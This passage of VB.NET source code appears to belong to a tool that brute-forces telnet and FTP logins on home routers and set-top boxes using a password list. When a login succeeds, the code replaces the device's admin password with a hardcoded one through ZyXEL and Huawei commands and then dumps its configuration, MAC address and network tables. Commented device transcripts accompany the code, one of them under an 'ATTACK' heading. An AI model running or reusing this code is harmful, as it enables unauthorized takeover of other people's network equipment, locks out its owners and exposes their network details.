				'gst-visualise-0.10     pidof.sysvinit         who
				'gst-xmlinspect         ping                   whoami
				'gst-xmlinspect-0.10    pivot_root             wpa_cli
				'gst-xmllaunch          poff                   wpa_passphrase
				'gst-xmllaunch-0.10     pon                    wpa_supplicant
				'gunzip                 portmap                wrjpgcom
				'gzip                   poweroff               xargs
				'halt                   pppd                   yes
				'halt.sysvinit          printf                 zcat
				'hddtemp                ps                     zeroconf
				'hdparm                 pwd
				'root@dm800:~#
				'root@dm800:~# passwd
				'Changing password for root
				'Enter the new password (minimum of 5, maximum of 8 characters)
				'Please use a combination of upper and lower case letters and numbers.
				'Enter new password:
				'Re-enter new password:
				'Password changed.
				'root@dm800:~#


				'********************************************************
				'BusyBox on (none) login: bad
				'Password:
				'Login incorrect

				'BusyBox on (none) login: admin
				'Password:


				'BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
				'Enter 'help' for a list of built-in commands.

				'# help

				'Built-in commands:
				'-------------------
				'        . : bg break builtin cd chdir continue eval exec exit export
				'        false fc fg hash help jobs kill local pwd read readonly return
				'        set setvar shift times trap true type ulimit umask unset wait


				'********************************************************
				'User Access Verification
				'
				'Password:
				'Password:
				'Password:
				'% Bad passwords


				'********************************************************
				'Huawei Home Gateway 550
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'Login: bad
				'Password:
				'Login incorrect. Try again.
				'Login: admin
				'Password:
				'Login incorrect. Try again.
				'Login: admin
				'Password:
				'Authorization failed after trying 3 times!!!.
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'wl driver adapter not found
				'Login:

				'#End Region

				For Each password As String In passwords
					Thread.Sleep(100)
					Try
						Sock_scan = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
						Sock_scan.Connect(ip)


						recv = Sock_scan.Receive(data)
						stringdata = Encoding.ASCII.GetString(data, 0, recv)
						'     Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);

						'Console.WriteLine("DEBUG Trying Password:{0}", password);
						'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
						Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password & vbCr), SocketFlags.None)
						'
'                            Byte[] smk = new Byte[password.Length];
'                            for (int i = 0; i < password.Length; i++)
'                            {
'                                Byte ss = Convert.ToByte(password[i]);
'                                smk[i] = ss;
'                            }
'                            Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
'                            


						'Thread.Sleep(100);

						recv = Sock_scan.Receive(data)
						stringdata = Encoding.ASCII.GetString(data, 0, recv)
						'Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
						recv = Sock_scan.Receive(data)
						stringdata = Encoding.ASCII.GetString(data, 0, recv)
						Console.WriteLine("{0} -> Response telnet02: " & stringdata, myip)
						If stringdata = "" Then
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> Response telnet02b: " & stringdata, myip)
						End If

						'stringdata = null;
						'bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
						'stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
						'Console.WriteLine("Response telnet: " + strRetPage);
						'while (bytes > 0)
						'{
						'    bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
						'    stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
						'    Console.WriteLine("Response telnet: " + strRetPage);
						'}



						'Bad Password!!!
						If stringdata.Contains("assword:") OrElse stringdata.Contains("Bad Password") Then
							'stringdata.Contains("*")
							'    Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
							Sock_scan.Close()
						Else
							Console.WriteLine("***********************************************************")
							Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}" & vbLf, myip, password)
							Console.WriteLine("***********************************************************")

							If stringdata.Contains("ZyXEL") Then
								'1234
								If stringdata.Contains("Menu") Then
									'1234
									Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" & vbCr), SocketFlags.None)
									recv = Sock_scan.Receive(data)
									stringdata = Encoding.ASCII.GetString(data, 0, recv)
									Console.WriteLine("{0} -> " & stringdata, myip)

									'             Menu 23 - System Password
									'Old Password= ?
									'New Password= ?
									'Retype to confirm= ?

									Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password & vbCr), SocketFlags.None)
									recv = Sock_scan.Receive(data)
									stringdata = Encoding.ASCII.GetString(data, 0, recv)
									Console.WriteLine("{0} -> " & stringdata, myip)

									Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" & vbCr), SocketFlags.None)
									recv = Sock_scan.Receive(data)
									stringdata = Encoding.ASCII.GetString(data, 0, recv)
									Console.WriteLine("{0} -> " & stringdata, myip)

									Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" & vbCr), SocketFlags.None)
									recv = Sock_scan.Receive(data)
									stringdata = Encoding.ASCII.GetString(data, 0, recv)
									Console.WriteLine("{0} -> " & stringdata, myip)

									Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(vbCr), SocketFlags.None)
									recv = Sock_scan.Receive(data)
									stringdata = Encoding.ASCII.GetString(data, 0, recv)

										'(Saving to ROM...)
										'Retour menu
									Console.WriteLine("{0} -> " & stringdata, myip)
								Else
									Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" & vbCr), SocketFlags.None)
									recv = Sock_scan.Receive(data)
									stringdata = Encoding.ASCII.GetString(data, 0, recv)
									Console.WriteLine("{0} -> " & stringdata, myip)
								End If
							Else
								Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" & vbCr), SocketFlags.None)
								recv = Sock_scan.Receive(data)
								stringdata = Encoding.ASCII.GetString(data, 0, recv)
									'save ok, new password is: j3R0m3!!.

									'''/Exemple: Vulcan
									'''/Erreur: Commande Invalide     
									'''/$passwd
									'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
									'''/Enter Old Password:
									'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
									'''/Enter New Password:
									'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
									'''/Confirm New Password:
									'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
									'''/Set Done
									'''/SINON:    Erreur: Combinaison nom dÃ†utilisateur/mot de passe invalide
								Console.WriteLine("{0} -> " & stringdata, myip)
							End If

							Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" & vbCr), SocketFlags.None)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)


							'***************
							Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" & vbCr), SocketFlags.None)
							'for MAC address
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)


							'
'                                    D-Link DSL 526B                                 >restoredefault
'                                    Huawei SmartAX MT882a              >sys romreset
'                                    TP-Link TD-8817                                >sys romreset
'                                


							'***************
							'For MT882A
							'
'                                MT882a> ether config
'                                --------------- NDIS CONFIGURATION BLOCK ----------------
'                                type=1 flags=0001
'                                Board/Chassis:1  Lines/Board:1  Channels/Lines:2 Total Channel:2
'                                task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
'                                board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
'                                board-pp (8042c8f0)
'                                804273fc
'                                line-pp (8042c8f4)
'                                8042956c
'                                chann-pp (8042c8f8)
'                                804bf8a4 804bfe34
'                                --------------- BOARD DISPLAY ---------------------------
'                                ID  slot#  n-line  n-chann  status  line-cfg  chann-cfg
'                                00      0       1        2    0001  8042c8bc    8042c8d0
'                                --------------- LINE  DISPLAY ---------------------------
'                                ID  line#  board-id  n-chann  chann-cfg
'                                00      1  00              2  8042c8d0
'                                --------------- CHANNEL DISPLAY -------------------------
'                                ID  chan#  line-id  board-id  address name
'                                00      1  00       00        804bf8a4  enet0
'                                01      2  00       00        804bfe34  enet1
'                                

							Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" & vbCr), SocketFlags.None)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)


							Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" & vbCr), SocketFlags.None)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)

							'
'                                MT882a> ip tcp status
'                                ( 1)tcpRtoAlgorithm              4     ( 2)tcpRtoMin                    0
'                                ( 3)tcpRtoMax           4294967295     ( 4)tcpMaxConn                  16
'                                ( 5)tcpActiveOpens               0     ( 6)tcpPassiveOpens            477
'                                ( 7)tcpAttemptFails             42     ( 8)tcpEstabResets              22
'                                ( 9)tcpCurrEstab                 1     (10)tcpInSegs                 9765
'                                (11)tcpOutSegs                2549     (12)tcpRetransSegs             389
'                                (14)tcpInErrs                    2     (15)tcpOutRsts                  93
'                                 tcbsInUseCnt = 4
'                                    &TCB Rcv-Q Snd-Q  Local socket           Remote socket          State
'                                804fdce4     0   621  41.248.40.35:23        196.12.232.120:61565   Estab 0
'                                804fd66c     0     0  0.0.0.0:21             0.0.0.0:0              Listen 0
'                                804fd558     0     0  0.0.0.0:7547           0.0.0.0:0              Listen (S) 0
'                                804fd444     0     0  0.0.0.0:80             0.0.0.0:0              Listen (S) 0
'                                


							Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" & vbCr), SocketFlags.None)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)
							recv = Sock_scan.Receive(data)
							stringdata = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0} -> " & stringdata, myip)



							'ATTACK
							'
'                                MT882a> ip ping
'                                Usage: ping <hostid>
'                                MT882a> ip ping www.google.com
'                                Resolving www.google.com... 173.194.67.105
'                                      sent      rcvd  rate    rtt     avg    mdev     max     min
'                                         1         1  100      80      80       0      80      80
'                                         2         2  100      80      80       0      80      80
'                                         3         3  100      80      80       0      80      80
'                                


							'
'                                MT882a> ip route
'                                status          add             addiface        addprivate
'                                addrom          drop
'                                MT882a> ip route status
'                                Dest            FF Len Device  Gateway         Metric stat Timer  Use   RN
'                                41.248.40.1     00 32  poe0    41.248.40.1       1    0329 0      0     ISP-0
'                                192.168.1.0     00 24  enet0   192.168.1.1       1    041b 0      0
'                                default         00 0   poe0    ISP-0             2    00ab 0      3245  ISP-0
'                                


							'
'                                MT882a> ether driver
'                                cnt             status          config          ackdrop
'                                macnum          ackmode         etherppp        wan2lan
'                                MT882a> ether driver cnt
'                                disp
'                                MT882a> ether driver cnt disp
'                                Usage: disp <name>
'                                MT882a> ether driver status
'                                Usage: driver status <ch-name>
'                                MT882a> ether driver config
'                                Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
'                                MT882a> ether driver ackdrop
'                                current ack drop number is 0
'                                ack drop cnt=0
'                                Usage: ackdrop <number>
'                                MT882a> ether driver macnum
'                                Please input allowed mac number(0~255), 0 means no limitation
'                                Current allowed mac number: 0
'                                MT882a> ether driver ackmode
'                                TCP ACK mode: off
'                                ACK length: 90
'                                TCP ACK mode type: Task
'                                MT882a> ether driver etherppp
'                                PPP check : on
'
'                                MT882a> ether driver wan2lan
'                                Usage: wan2lan [on||off] <number>
'                                Current wan2lan feature status: off
'                                




							'
'                                MT882a> wan
'                                atm             node            hwsar           adsl
'                                tsarm
'                                MT882a> wan atm
'                                test            mpoasendloop    oam             vcpool
'                                MT882a> wan atm test
'                                Usage: test [fix|rand|period|oam|loopback]
'                                MT882a> wan node
'                                index           display         clear           save
'                                ispname         enable          disable         encap
'                                mux             vpi             vci             qos
'                                pcr             scr             mbs             cdvt
'                                wanip           remoteip        bridge          routeip
'                                nat             rip             multicast       callsch
'                                service         nailedup        filter          ppp
'                                mtu             default_r
'                                MT882a> wan node display
'                                WAN node index = 1
'                                Active = no
'                                Route IP = off
'                                Bridge = off
'                                Name =
'                                Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
'                                Mux <1:LLC|2:VC> = 0
'                                VPI/VCI = 0 / 0
'                                PPPoE service name =
'                                PPP username =
'                                PPP password =
'                                PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
'                                SUA/NAT is disabled
'                                Static IP address
'                                WAN IP address        = 0.0.0.0
'                                Remote IP address     = 0.0.0.0
'                                Remote IP subnet mask = 0.0.0.0
'                                Idle timeout = 0
'                                Call scheduling set =   1  1  1  1
'                                Nailed-up connection = off
'                                QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
'                                QOS PCR/SCR/MBS/CDVT =     0,    0,    0,    0
'                                RIP direction <0:none|1:both|2:in|3:out>= 0
'                                RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
'                                Multicast <0:IGMP-v2|1:IGMP-v1|2:none>  = 0
'                                Incoming protocol filter set =   1  1  1  1
'                                Incoming device filter set   =   1  1  1  1
'                                Outgoing protocol filter set =   1  1  1  1
'                                Outgoing device filter set   =   1  1  1  1
'                                MT882a> wan node wanip
'                                Usage: wan node wanip <static> <ip address>
'                                or:    wan node wanip <dynamic>
'                                errcode = -4
'                                




							'
'                                MT882a> wan adsl
'                                chandata        close           coding          defbitmap
'                                linedata        open            opencmd         opmode
'                                perfdata        reset           status          version
'                                vendorid        utopia          nearituid       farituid
'                                cellcnt         display         rateadap        dumpcondition
'                                sampletime      noisegt         noisemargin     persisttime
'                                timeinterval    defectcheck     txgain          targetnoise
'                                txfilter        setrvid         txtones         snroffset
'                                errorsecond     diag            watchdog        fwversion
'                                uptime          dumprate        annex
'                                MT882a> wan adsl display
'                                shutdown        rateup
'                                MT882a> wan adsl fwversion
'                                DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
'                                
'                                MT882a> wan adsl utopia
'                                UTOPIA parameters:
'                                   level: 1
'                                   fast address: 0
'                                   interleaved address: 1
'                                MT882a> wan adsl coding
'                                line coding: DMT
'                                MT882a> wan adsl txtones
'                                usage: <start tone> <end tone> tone=0x6~0x1F
'                                current value: start_tone=6 end_tone=1f
'                                MT882a> wan adsl opmode
'                                operational mode: ITU G.992.5(ADSL2PLUS)
'                                
'                                MT882a> wan adsl uptime
'                                    ADSL uptime   122:15:16
'                                    MT882a> wan adsl sampletime
'                                    Usage: min
'                                    MT882a> wan adsl linedata
'                                    far             near
'                                    MT882a> wan adsl linedata near
'                                    relative capacity occupation: 100%
'                                    noise margin downstream: 37.0 db
'                                    output power upstream: 11.3 dbm
'                                    attenuation downstream: 13.7 db
'                                    MT882a> wan adsl linedata far
'                                    relative capacity occupation: 100%
'                                    noise margin upstream: 34.5 db
'                                    output power downstream: 19.3 dbm
'                                    attenuation upstream: 9.6 db
'                                    carrier load: number of bits per symbol(tone)
'                                    tone   0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
'                                    tone  32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
'                                    tone  64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
'                                    tone  96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
'                                    tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
'                                    tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
'                                    tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
'                                    tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
'                                    tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
'                                    tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
'                                    tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
'                                    tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
'                                    tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
'                                    tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
'                                    tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
'                                    tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
'                                
'                                MT882a> dot1q disp
'                                        802.1Q Tagged-based VLAN: Inactive(1)
'
'                                         Port | PVID   || Port | PVID   || Port | PVID   || Port | PVID   ||
'                                        ------+--------++------+--------++------+--------++------+--------++
'                                           e1 |     1  ||
'                                           p0 |     1  ||   p1 |     1  ||   p2 |     1  ||   p3 |     1  ||
'                                           p4 |     1  ||   p5 |     1  ||   p6 |     1  ||   p7 |     1  ||
'                                            u |     1  ||
'                                          cpu |    15  ||
'
'                                        No|Act| VID|    Name   |        Egress Port
'                                        --+---+----+-----------+------------------------------------------
'                                                               |    Tagged Egress Port
'                                                               +------------------------------------------
'                                         0| N |   0|           |
'                                                               |
'                                         1| N |   0|           |
'                                                               |
'                                         2| N |   0|           |
'                                                               |
'                                         3| N |   0|           |
'                                                               |
'                                         4| N |   0|           |
'                                                               |
'                                         5| N |   0|           |
'                                                               |
'                                         6| N |   0|           |
'                                                               |
'                                         7| N |   0|           |
'                                                               |
'                                         8| N |   0|           |
'                                                               |
'                                         9| N |   0|           |
'                                                               |
'                                        10| N |   0|           |
'                                                               |
'                                        11| N |   0|           |
'                                                               |
'                                        12| N |   0|           |
'                                                               |
'                                        13| N |   0|           |
'                                                               |
'                                        14| Y |   1|     vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
'                                                               |
'                                        15| Y |  15|     vlan15|e1,u
'                                                               |
'                                







							Sock_scan.Close()
							Exit Try
						End If
					Catch e As Exception
						Console.WriteLine("DEBUG EXCEPTION02: {0} -> " & e.Message, myip)
					End Try
				Next
			Else
				Console.WriteLine("{0} DEBUG no telnet Password: " & banner, myip)
			End If

			'                Sock_scan.Close();
		End Sub

		Public Shared Sub ftptry(myip As String)
			Console.WriteLine("ftptry")

			Dim data As Byte() = New Byte(1023) {}
			Dim stringdata As String
			Dim recv As Integer

			Dim adresseIP As IPAddress = IPAddress.Parse(myip)
			Dim ip As New IPEndPoint(adresseIP, 21)
			Dim Sock_scan As New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
			Sock_scan.Connect(ip)

			recv = Sock_scan.Receive(data)
			Console.WriteLine("Banner ftp: " & Encoding.ASCII.GetString(data, 0, recv))

			For Each password As String In passwords
				Try
					Console.WriteLine("{0} -> USER", myip)
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" & Convert.ToChar(32) & "admin" & Convert.ToChar(13) & Convert.ToChar(10)))
					recv = Sock_scan.Receive(data)
					Console.WriteLine("{0} -> Response ftp: " & Encoding.ASCII.GetString(data, 0, recv), myip)
					'331 Please specify the password.
					'331 Enter PASS command
					'331 User name okay, need password.

					Console.WriteLine("{0} -> PASS", myip)
					Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" & Convert.ToChar(32) & password & Convert.ToChar(13) & Convert.ToChar(10)))
					recv = Sock_scan.Receive(data)
					stringdata = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0} -> Response ftp: " & stringdata, myip)
					'530 Login incorrect.
					'530 Not logged in.
					'530 User admin cannot log in.
					If stringdata.Contains("530") Then
						Console.Write("{0} -> bad ftp password: {1}" & vbLf, myip, password)
					End If
					'230 User logged in, proceed.
					If stringdata.Contains("230") Then
						Console.Write("{0} -> FTP PASSWORD IS: {1}" & vbLf, myip, password)
						Exit Try

					End If
				Catch e As Exception
					Console.WriteLine("{0} -> " & e.Message, myip)
				End Try
			Next

			Sock_scan.Close()

			'
'            FtpWebRequest reqFTP;
'            reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
'            reqFTP.Credentials = new NetworkCredential("login", "pass");
'            reqFTP.KeepAlive = false;
'            reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
'            // On recupere la response du serveur FTP
'            FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
'            Console.WriteLine("{0} -> RÃ©ponse FTP:" + response, myip);
'
'        /*
'            // On rÃ©cupere le flux de la rÃ©ponse
'            StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
'            //On enregistre la liste dans un chaine
'            string listeBrute = monStreamReader.ReadToEnd();
'            //On recupere l'ensemble des fichiers de la chaine
'            string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
'            //On retourne la liste des rÃ©pertoires
'            //return liste;
'        



		End Sub

		'
'        public static void ConnectCallback(IAsyncResult ar)
'        {
'            try
'            {
'                // Get The connection socket from the callback
'                Socket sock1 = (Socket)ar.AsyncState;
'                sock1.Blocking = false; // This is a non blocking IO
'                if (sock1.Connected)
'                {
'                    // Define a new Callback to read the data 
'                    AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
'                    // Begin reading data asyncronously
'                    sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
'                }
'            }
'            catch (Exception ex)
'            {
'                Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
'            }
'        }
'


		Private Shared Sub ConnectCallback(ar As IAsyncResult)
			Try

				' Retrieve the socket from the state object.
				Dim client As Socket = DirectCast(ar.AsyncState, Socket)

				' Complete the connection.
				client.EndConnect(ar)

				Console.WriteLine("Socket connected to {0}", client.RemoteEndPoint.ToString())

				' Signal that the connection has been made.
				connectDone.[Set]()

					'cpt_th.Decrementer();
				Console.WriteLine("DEBUG ConnectCallback")
			Catch e As Exception
				Console.WriteLine("ERROR ConnectCallback: " & e.ToString())
			End Try
		End Sub

		Private Shared Sub Receive(client As Socket)
			Try
				' Create the state object.
				Dim state As New StateObject()
				state.workSocket = client

				' Begin receiving the data from the remote device.
				client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0, New AsyncCallback(AddressOf ReceiveCallback), state)
			Catch e As Exception
				Console.WriteLine(e.ToString())
			End Try
		End Sub

		Private Shared Sub ReceiveCallback(ar As IAsyncResult)
			Try
				' Retrieve the state object and the client socket 
				' from the asynchronous state object.
				Dim state As StateObject = DirectCast(ar.AsyncState, StateObject)
				Dim client As Socket = state.workSocket

				' Read data from the remote device.
				Dim bytesRead As Integer = client.EndReceive(ar)

				If bytesRead > 0 Then
					' There might be more data, so store the data received so far.
					state.sb.Append(Encoding.ASCII.GetString(state.buffer, 0, bytesRead))

					' Get the rest of the data.
					client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0, New AsyncCallback(AddressOf ReceiveCallback), state)
				Else
					' All the data has arrived; put it in response.
					If state.sb.Length > 1 Then
						response = state.sb.ToString()
					End If
					' Signal that all bytes have been received.
					receiveDone.[Set]()
				End If
			Catch e As Exception
				Console.WriteLine(e.ToString())
			End Try
		End Sub


		' State object for receiving data from remote device.
		Public Class StateObject
			' Client socket.
			Public workSocket As Socket = Nothing
			' Size of receive buffer.
			Public Const BufferSize As Integer = 256
			' Receive buffer.
			Public buffer As Byte() = New Byte(BufferSize - 1) {}
			' Received data string.
			Public sb As New StringBuilder()
		End Class






		Private Shared Function ProcessOptions(m_strLineToProcess As Byte()) As String
			Dim m_DISPLAYTEXT As String = ""
			Dim m_strTemp As String = ""
			Dim m_strOption As String = ""
			Dim m_strNormalText As String = ""
			Dim bScanDone As Boolean = False
			Dim ndx As Integer = 0
			Dim ldx As Integer = 0
			Dim ch As Char
			Try
				For i As Integer = 0 To m_strLineToProcess.Length - 1
					Dim ss As [Char] = Convert.ToChar(m_strLineToProcess(i))
					m_strTemp = m_strTemp & Convert.ToString(ss)
				Next

				While bScanDone <> True
					Dim lensmk As Integer = m_strTemp.Length
					ndx = m_strTemp.IndexOf(Convert.ToString(IAC))
					If ndx > lensmk Then
						ndx = m_strTemp.Length
					End If

					If ndx <> -1 Then
						m_DISPLAYTEXT += m_strTemp.Substring(0, ndx)
						ch = m_strTemp(ndx + 1)
						If ch = [DO] OrElse ch = DONT OrElse ch = WILL OrElse ch = WONT Then
							m_strOption = m_strTemp.Substring(ndx, 3)
							Dim txt As String = m_strTemp.Substring(ndx + 3)
							m_DISPLAYTEXT += m_strTemp.Substring(0, ndx)
							m_ListOptions.Add(m_strOption)
							m_strTemp = txt
						ElseIf ch = IAC Then
							m_DISPLAYTEXT = m_strTemp.Substring(0, ndx)
							m_strTemp = m_strTemp.Substring(ndx + 1)
						ElseIf ch = SB Then
							m_DISPLAYTEXT = m_strTemp.Substring(0, ndx)
							ldx = m_strTemp.IndexOf(Convert.ToString(SE))
							m_strOption = m_strTemp.Substring(ndx, ldx)
							m_ListOptions.Add(m_strOption)
							m_strTemp = m_strTemp.Substring(ldx)
						End If
					Else
						m_DISPLAYTEXT = m_DISPLAYTEXT & m_strTemp
						bScanDone = True
					End If
				End While
				m_strNormalText = m_DISPLAYTEXT
			Catch eP As Exception
					'Application.Exit();
				Console.WriteLine(eP.Message, "Application Error!!!")
			End Try
			Return m_strNormalText
		End Function

		Public Shared Sub OnRecievedData(ar As IAsyncResult)
			' Get The connection socket from the callback
			Dim sock As Socket = DirectCast(ar.AsyncState, Socket)
			sock.Blocking = False
			' This is a non blocking IO
			' Get The data , if any
			Dim nBytesRec As Integer = sock.EndReceive(ar)
			If nBytesRec > 0 Then
				Dim sRecieved As String = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec)
				Dim m_strLine As String = ""
				Dim myline As String = Nothing
				For i As Integer = 0 To nBytesRec - 1
					Dim ch As [Char] = Convert.ToChar(m_byBuff(i))
					Select Case ch
						Case ControlChars.Cr
							m_strLine += Convert.ToString(vbCr & vbLf)
							Exit Select
						Case ControlChars.Lf
							Exit Select
						Case Else
							m_strLine += Convert.ToString(ch)
							Exit Select
					End Select
				Next
				Try
					Dim strLinelen As Integer = m_strLine.Length
					If strLinelen = 0 Then
						m_strLine = Convert.ToString(vbCr & vbLf)
					End If

					Dim mToProcess As [Byte]() = New [Byte](strLinelen - 1) {}
					For i As Integer = 0 To strLinelen - 1
						mToProcess(i) = Convert.ToByte(m_strLine(i))
					Next
					' Process the incoming data
